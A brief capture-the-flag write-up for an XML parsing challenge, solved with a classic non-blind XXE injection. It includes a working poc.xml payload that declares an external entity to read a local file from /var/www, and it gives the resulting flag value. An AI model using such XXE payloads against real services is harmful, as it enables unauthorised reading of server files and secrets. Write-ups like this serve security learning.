EXtravagent

I've been working on a XML parsing service. It's not finished but there should be enough for you to try out.

The flag is in /var/www

Challenge

TL;DR: Classic Non-blind XXE Injection

Visiting the challenge site, we are greeted with a file upload and an XML file viewer. So we try the basic XXE payload that lets us see the /var/www/flag.txt file (since this was what the description hinted):

poc.xml:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///var/www/flag.txt'>]>
<root>&test;</root>

Uploading it:

Viewing it:

Getting the flag:

Flag: flag{639b72f2dd0017f454c44c3863c4e195}